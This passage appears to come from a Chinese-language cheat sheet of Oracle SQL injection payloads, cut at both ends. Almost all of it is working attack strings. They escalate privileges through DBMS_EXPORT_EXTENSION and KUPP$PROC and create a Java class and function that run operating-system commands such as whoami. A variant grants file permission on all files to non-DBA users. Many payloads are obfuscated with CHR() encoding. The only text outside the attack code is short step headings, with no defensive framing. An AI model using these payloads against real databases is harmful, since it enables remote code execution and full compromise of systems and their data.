\u8d4b\u4e88\u6240\u6709\u4eba\u6267\u884c\u6743\u9650\n' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on runcmd to public'''';END;'';END;--','SYS',0,'1',0) from dual)=0--\n5.\u547d\u4ee4\u6267\u884c\n' and 1=2 union select 1,sys.runcmd('cmd \/c ver'),2 from dual--\n\n2. hacking Oracle Database 11.1.0.7.0 \u4ee5\u53ca\u66f4\u4f4e\u7248\u672c(The 11.2.0.1 April CPU patch fixes this)\n\u5f53\u524d\u7528\u6237\u6709dba\u6743\u9650\n1. #\u8d4b\u4e88SYSTEM Javasyspriv Only DBA can call this function\n(select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(begin execute immediate 'grant javasyspriv to SYSTEM';end;)from dual) is not null   \n' AND (select SYS.KUPP$PROC.CREATE_MASTER_PROCESS(CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(103)||CHR(114)||CHR(97)||CHR(110)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(115)||CHR(121)||CHR(115)||CHR(112)||CHR(114)||CHR(105)||CHR(118)||CHR(32)||CHR(116)||CHR(111)||CHR(32)||CHR(83)||CHR(89)||CHR(83)||CHR(84)||CHR(69)||CHR(77)||CHR(39)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59))from dual) is not null-- \n2. \u521b\u5efajavaexec\u5305\n' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and resolve java source named \"javaexec\" as import java.lang.*;import java.io.*;public class javaexec{public static String Ecmd(String ss) throws IOException{BufferedReader mR= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(ss).getInputStream()));String st,str=\"\";while ((st=mR.readLine()) != null) str += st+\"\\n\";mR.close();return str;}}'';commit; end;') from dual) where rownum=1--\n' and (select dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(114)||CHR(101)||CHR(115)||CHR(111)||CHR(108)||CHR(118)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(115)||CHR(111)||CHR(117)||CHR(114)||CHR(99)||CHR(101)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(100)||CHR(32)||CHR(34)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(34)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(42)||CHR(59)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(105)||CHR(111)||CHR(46)||CHR(42)||CHR(59)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(99)||CHR(108)||CHR(97)||CHR(115)||CHR(115)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(123)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(115)||CHR(116)||CHR(97)||CHR(116)||CHR(105)||CHR(99)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(69)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(115)||CHR(41)||CHR(32)||CHR(116)||CHR(104)||CHR(114)||CHR(111)||CHR(119)||CHR(115)||CHR(32)||CHR(73)||CHR(79)||CHR(69)||CHR(120)||CHR(99)||CHR(101)||CHR(112)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(123)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(32)||CHR(109)||CHR(82)||CHR(61)||CHR(32)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(40)||CHR(41)||CHR(46)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(40)||CHR(115)||CHR(115)||CHR(41)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(40)||CHR(41)||CHR(41)||CHR(41)||CHR(59)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(116)||CHR(44)||CHR(115)||CHR(116)||CHR(114)||CHR(61)||CHR(34)||CHR(34)||CHR(59)||CHR(119)||CHR(104)||CHR(105)||CHR(108)||CHR(101)||CHR(32)||CHR(40)||CHR(40)||CHR(115)||CHR(116)||CHR(61)||CHR(109)||CHR(82)||CHR(46)||CHR(114)||CHR(101)||CHR(97)||CHR(100)||CHR(76)||CHR(105)||CHR(110)||CHR(101)||CHR(40)||CHR(41)||CHR(41)||CHR(32)||CHR(33)||CHR(61)||CHR(32)||CHR(110)||CHR(117)||CHR(108)||CHR(108)||CHR(41)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(32)||CHR(43)||CHR(61)||CHR(32)||CHR(115)||CHR(116)||CHR(43)||CHR(34)||CHR(92)||CHR(110)||CHR(34)||CHR(59)||CHR(109)||CHR(82)||CHR(46)||CHR(99)||CHR(108)||CHR(111)||CHR(115)||CHR(101)||CHR(40)||CHR(41)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(59)||CHR(125)||CHR(125)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n3.\u521b\u5efajavacmd\u51fd\u6570\n' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function javacmd(p_filename in varchar2)return varchar2 as language java name ''''javaexec.Ecmd(java.lang.String)return String'''';''; commit; end;') from dual) where rownum=1--\n' and (select dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(112)||CHR(95)||CHR(102)||CHR(105)||CHR(108)||CHR(101)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(105)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(117)||CHR(97)||CHR(103)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(46)||CHR(69)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(39)||CHR(39)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n4. \u547d\u4ee4\u6267\u884c\n' and 1=2 union select 1,(select javacmd('whoami') from dual),'3' from dual--\n'||utl_inaddr.get_host_name((select javacmd('ping 8.8.8.8') from dual))||'\n\nnot dba(11g\u53ea\u9700\u8981java.io.permisson\u5373\u53ef,10g\u989d\u5916\u9700\u8981readFileDescriptor writeFileDescriptor\u6743\u9650)\n' and (select dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(114)||CHR(101)||CHR(115)||CHR(111)||CHR(108)||CHR(118)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(115)||CHR(111)||CHR(117)||CHR(114)||CHR(99)||CHR(101)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(100)||CHR(32)||CHR(34)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(34)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(42)||CHR(59)||CHR(105)||CHR(109)||CHR(112)||CHR(111)||CHR(114)||CHR(116)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(105)||CHR(111)||CHR(46)||CHR(42)||CHR(59)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(99)||CHR(108)||CHR(97)||CHR(115)||CHR(115)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(123)||CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)||CHR(32)||CHR(115)||CHR(116)||CHR(97)||CHR(116)||CHR(105)||CHR(99)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(69)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(115)||CHR(41)||CHR(32)||CHR(116)||CHR(104)||CHR(114)||CHR(111)||CHR(119)||CHR(115)||CHR(32)||CHR(73)||CHR(79)||CHR(69)||CHR(120)||CHR(99)||CHR(101)||CHR(112)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(123)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(32)||CHR(109)||CHR(82)||CHR(61)||CHR(32)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(66)||CHR(117)||CHR(102)||CHR(102)||CHR(101)||CHR(114)||CHR(101)||CHR(100)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(110)||CHR(101)||CHR(119)||CHR(32)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(82)||CHR(101)||CHR(97)||CHR(100)||CHR(101)||CHR(114)||CHR(40)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(40)||CHR(41)||CHR(46)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(40)||CHR(115)||CHR(115)||CHR(41)||CHR(46)||CHR(103)||CHR(101)||CHR(116)||CHR(73)||CHR(110)||CHR(112)||CHR(117)||CHR(116)||CHR(83)||CHR(116)||CHR(114)||CHR(101)||CHR(97)||CHR(109)||CHR(40)||CHR(41)||CHR(41)||CHR(41)||CHR(59)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(32)||CHR(115)||CHR(116)||CHR(44)||CHR(115)||CHR(116)||CHR(114)||CHR(61)||CHR(34)||CHR(34)||CHR(59)||CHR(119)||CHR(104)||CHR(105)||CHR(108)||CHR(101)||CHR(32)||CHR(40)||CHR(40)||CHR(115)||CHR(116)||CHR(61)||CHR(109)||CHR(82)||CHR(46)||CHR(114)||CHR(101)||CHR(97)||CHR(100)||CHR(76)||CHR(105)||CHR(110)||CHR(101)||CHR(40)||CHR(41)||CHR(41)||CHR(32)||CHR(33)||CHR(61)||CHR(32)||CHR(110)||CHR(117)||CHR(108)||CHR(108)||CHR(41)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(32)||CHR(43)||CHR(61)||CHR(32)||CHR(115)||CHR(116)||CHR(43)||CHR(34)||CHR(92)||CHR(110)||CHR(34)||CHR(59)||CHR(109)||CHR(82)||CHR(46)||CHR(99)||CHR(108)||CHR(111)||CHR(115)||CHR(101)||CHR(40)||CHR(41)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(115)||CHR(116)||CHR(114)||CHR(59)||CHR(125)||CHR(125)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n' and (select dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(112)||CHR(95)||CHR(102)||CHR(105)||CHR(108)||CHR(101)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(105)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(118)||CHR(97)||CHR(114)||CHR(99)||CHR(104)||CHR(97)||CHR(114)||CHR(50)||CHR(32)||CHR(97)||CHR(115)||CHR(32)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(117)||CHR(97)||CHR(103)||CHR(101)||CHR(32)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(110)||CHR(97)||CHR(109)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(46)||CHR(69)||CHR(99)||CHR(109)||CHR(100)||CHR(40)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(41)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(83)||CHR(116)||CHR(114)||CHR(105)||CHR(110)||CHR(103)||CHR(39)||CHR(39)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) from dual) is not null--\n' and dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(109)||CHR(121)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(32)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(110)||CHR(117)||CHR(109)||CHR(98)||CHR(101)||CHR(114)||CHR(32)||CHR(105)||CHR(115)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(68)||CHR(69)||CHR(67)||CHR(76)||CHR(65)||CHR(82)||CHR(69)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(32)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(84)||CHR(69)||CHR(77)||CHR(80)||CHR(95)||CHR(74)||CHR(65)||CHR(86)||CHR(65)||CHR(95)||CHR(80)||CHR(79)||CHR(76)||CHR(73)||CHR(67)||CHR(89)||CHR(59)||CHR(67)||CHR(85)||CHR(82)||CHR(83)||CHR(79)||CHR(82)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(73)||CHR(83)||CHR(32)||CHR(32)||CHR(32)||CHR(83)||CHR(69)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(71)||CHR(82)||CHR(65)||CHR(78)||CHR(84)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(40)||CHR(41)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(83)||CHR(89)||CHR(83)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(105)||CHR(111)||CHR(46)||CHR(70)||CHR(105)||CHR(108)||CHR(101)||CHR(80)||CHR(101)||CHR(114)||CHR(109)||CHR(105)||CHR(115)||CHR(115)||CHR(105)||CHR(111)||CHR(110)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(32)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(60)||CHR(60)||CHR(65)||CHR(76)||CHR(76)||CHR(32)||CHR(70)||CHR(73)||CHR(76)||CHR(69)||CHR(83)||CHR(62)||CHR(62)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(69)||CHR(78)||CHR(65)||CHR(66)||CHR(76)||CHR(69)||CHR(68)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(32)||CHR(102)||CHR(114)||CHR(111)||CHR(109)||CHR(32)||CHR(100)||CHR(117)||CHR(97)||CHR(108)||CHR(59)||CHR(66)||CHR(69)||CHR(71)||CHR(73)||CHR(78)||CHR(32)||CHR(79)||CHR(80)||CHR(69)||CHR(78)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(32)||CHR(32)||CHR(70)||CHR(69)||CHR(84)||CHR(67)||CHR(72)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(66)||CHR(85)||CHR(76)||CHR(75)||CHR(32)||CHR(67)||CHR(79)||CHR(76)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(73)||CHR(78)||CHR(84)||CHR(79)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(59)||CHR(67)||CHR(76)||CHR(79)||CHR(83)||CHR(69)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(73)||CHR(77)||CHR(80)||CHR(79)||CHR(82)||CHR(84)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(40)||CHR(80)||CHR(79)||CHR(76)||CHR(41)||CHR(59)||CHR(69)||CHR(78)||CHR(68)||CHR(59)||CHR(39)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(49)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(32)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) is not null--\n' and 1=myjava()--\n' and 